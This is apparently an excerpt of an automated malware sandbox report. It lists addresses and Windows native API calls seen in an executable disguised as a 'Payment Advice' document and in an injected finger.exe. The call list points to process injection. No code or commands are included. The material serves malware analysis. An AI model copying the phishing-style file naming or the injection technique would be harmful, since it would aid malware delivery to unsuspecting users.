                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E4650 NtSuspendThread,4_2_016E4650
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BE0 NtQueryValueKey,4_2_016E2BE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BF0 NtAllocateVirtualMemory,4_2_016E2BF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BA0 NtEnumerateValueKey,4_2_016E2BA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2B80 NtQueryInformationFile,4_2_016E2B80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AF0 NtWriteFile,4_2_016E2AF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AD0 NtReadFile,4_2_016E2AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AB0 NtWaitForSingleObject,4_2_016E2AB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D30 NtUnmapViewOfSection,4_2_016E2D30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D00 NtSetInformationFile,4_2_016E2D00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D10 NtMapViewOfSection,4_2_016E2D10
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DD0 NtDelayExecution,4_2_016E2DD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DB0 NtEnumerateKey,4_2_016E2DB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C60 NtCreateKey,4_2_016E2C60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C00 NtQueryInformationProcess,4_2_016E2C00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CF0 NtOpenProcess,4_2_016E2CF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CC0 NtQueryVirtualMemory,4_2_016E2CC0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CA0 NtQueryInformationToken,4_2_016E2CA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F60 NtCreateProcessEx,4_2_016E2F60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F30 NtCreateSection,4_2_016E2F30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FE0 NtCreateFile,4_2_016E2FE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FA0 NtQuerySection,4_2_016E2FA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FB0 NtResumeThread,4_2_016E2FB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F90 NtProtectVirtualMemory,4_2_016E2F90
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2E30 NtWriteVirtualMemory,4_2_016E2E30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2EE0 NtQueueApcThread,4_2_016E2EE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2EA0 NtAdjustPrivilegesToken,4_2_016E2EA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2E80 NtReadVirtualMemory,4_2_016E2E80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E3010 NtOpenDirectoryObject,4_2_016E3010
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E3090 NtSetValueKey,4_2_016E3090
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E39B0 NtGetContextThread,4_2_016E39B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E3D70 NtOpenThread,4_2_016E3D70
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E3D10 NtOpenProcessToken,4_2_016E3D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A34340 NtSetContextThread,LdrInitializeThunk,9_2_03A34340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A34650 NtSuspendThread,LdrInitializeThunk,9_2_03A34650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03A32BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03A32BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03A32BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32B60 NtClose,LdrInitializeThunk,9_2_03A32B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32AF0 NtWriteFile,LdrInitializeThunk,9_2_03A32AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32AD0 NtReadFile,LdrInitializeThunk,9_2_03A32AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32FB0 NtResumeThread,LdrInitializeThunk,9_2_03A32FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32FE0 NtCreateFile,LdrInitializeThunk,9_2_03A32FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32F30 NtCreateSection,LdrInitializeThunk,9_2_03A32F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03A32E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03A32EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03A32DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32DD0 NtDelayExecution,LdrInitializeThunk,9_2_03A32DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03A32D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03A32D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03A32CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32C60 NtCreateKey,LdrInitializeThunk,9_2_03A32C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03A32C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A335C0 NtCreateMutant,LdrInitializeThunk,9_2_03A335C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A339B0 NtGetContextThread,LdrInitializeThunk,9_2_03A339B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32B80 NtQueryInformationFile,9_2_03A32B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32AB0 NtWaitForSingleObject,9_2_03A32AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32FA0 NtQuerySection,9_2_03A32FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32F90 NtProtectVirtualMemory,9_2_03A32F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32F60 NtCreateProcessEx,9_2_03A32F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32EA0 NtAdjustPrivilegesToken,9_2_03A32EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32E30 NtWriteVirtualMemory,9_2_03A32E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32DB0 NtEnumerateKey,9_2_03A32DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32D00 NtSetInformationFile,9_2_03A32D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32CF0 NtOpenProcess,9_2_03A32CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32CC0 NtQueryVirtualMemory,9_2_03A32CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A32C00 NtQueryInformationProcess,9_2_03A32C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A33090 NtSetValueKey,9_2_03A33090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A33010 NtOpenDirectoryObject,9_2_03A33010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A33D10 NtOpenProcessToken,9_2_03A33D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A33D70 NtOpenThread,9_2_03A33D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F69760 NtReadFile,9_2_02F69760
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F695F0 NtCreateFile,9_2_02F695F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F69A60 NtAllocateVirtualMemory,9_2_02F69A60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F698F0 NtClose,9_2_02F698F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F69850 NtDeleteFile,9_2_02F69850
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386FB66 NtSetContextThread,9_2_0386FB66
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386F9B8 NtClose,9_2_0386F9B8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_071C0D580_2_071C0D58
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B3E280_2_025B3E28
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B6F9B0_2_025B6F9B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025BDFB40_2_025BDFB4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D500400_2_04D50040
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D5003B0_2_04D5003B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D56CB80_2_04D56CB8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DA52C80_2_04DA52C8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DA47E80_2_04DA47E8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DA27680_2_04DA2768
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DA27300_2_04DA2730
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_06BE08A40_2_06BE08A4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_06BE25270_2_06BE2527
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_06BE089B0_2_06BE089B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00418C334_2_00418C33
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004029E04_2_004029E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004011B04_2_004011B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004032204_2_00403220
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0042F3D34_2_0042F3D3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0041044B4_2_0041044B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004104534_2_00410453
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00401CC04_2_00401CC0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00401CB64_2_00401CB6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0040E6534_2_0040E653
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00402E6F4_2_00402E6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00402E704_2_00402E70
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004106734_2_00410673
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00416E334_2_00416E33
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0040272C4_2_0040272C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004027304_2_00402730
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0040E7A34_2_0040E7A3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017381584_2_01738158
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A01004_2_016A0100
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174A1184_2_0174A118
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017681CC4_2_017681CC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017641A24_2_017641A2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017701AA4_2_017701AA
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017420004_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176A3524_2_0176A352
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017703E64_2_017703E6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE3F04_2_016BE3F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017502744_2_01750274
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017302C04_2_017302C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B05354_2_016B0535
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017705914_2_01770591
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017624464_2_01762446
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017544204_2_01754420
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175E4F64_2_0175E4F6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B07704_2_016B0770
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D47504_2_016D4750
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AC7C04_2_016AC7C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CC6E04_2_016CC6E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C69624_2_016C6962
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B29A04_2_016B29A0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0177A9A64_2_0177A9A6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BA8404_2_016BA840
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B28404_2_016B2840
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DE8F04_2_016DE8F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016968B84_2_016968B8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176AB404_2_0176AB40
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01766BD74_2_01766BD7
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AEA804_2_016AEA80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BAD004_2_016BAD00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174CD1F4_2_0174CD1F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AADE04_2_016AADE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C8DBF4_2_016C8DBF
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0C004_2_016B0C00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A0CF24_2_016A0CF2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01750CB54_2_01750CB5
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01724F404_2_01724F40
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01752F304_2_01752F30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F2F284_2_016F2F28
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D0F304_2_016D0F30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A2FC84_2_016A2FC8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172EFA04_2_0172EFA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0E594_2_016B0E59
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176EE264_2_0176EE26
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176EEDB4_2_0176EEDB
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176CE934_2_0176CE93
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C2E904_2_016C2E90
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E516C4_2_016E516C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169F1724_2_0169F172
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0177B16B4_2_0177B16B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BB1B04_2_016BB1B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176F0E04_2_0176F0E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017670E94_2_017670E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B70C04_2_016B70C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175F0CC4_2_0175F0CC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169D34C4_2_0169D34C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176132D4_2_0176132D
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F739A4_2_016F739A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017512ED4_2_017512ED
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CD2F04_2_016CD2F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CB2C04_2_016CB2C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B52A04_2_016B52A0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017675714_2_01767571
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017795C34_2_017795C3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174D5B04_2_0174D5B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A14604_2_016A1460
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176F43F4_2_0176F43F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176F7B04_2_0176F7B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F56304_2_016F5630
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017616CC4_2_017616CC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B99504_2_016B9950
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CB9504_2_016CB950
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017459104_2_01745910
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171D8004_2_0171D800
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B38E04_2_016B38E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176FB764_2_0176FB76
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01725BF04_2_01725BF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016EDBF94_2_016EDBF9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CFB804_2_016CFB80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01723A6C4_2_01723A6C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01767A464_2_01767A46
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176FA494_2_0176FA49
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175DAC64_2_0175DAC6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F5AA04_2_016F5AA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01751AA34_2_01751AA3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174DAAC4_2_0174DAAC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01767D734_2_01767D73
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B3D404_2_016B3D40
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01761D5A4_2_01761D5A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CFDC04_2_016CFDC0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01729C324_2_01729C32
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176FCF24_2_0176FCF2
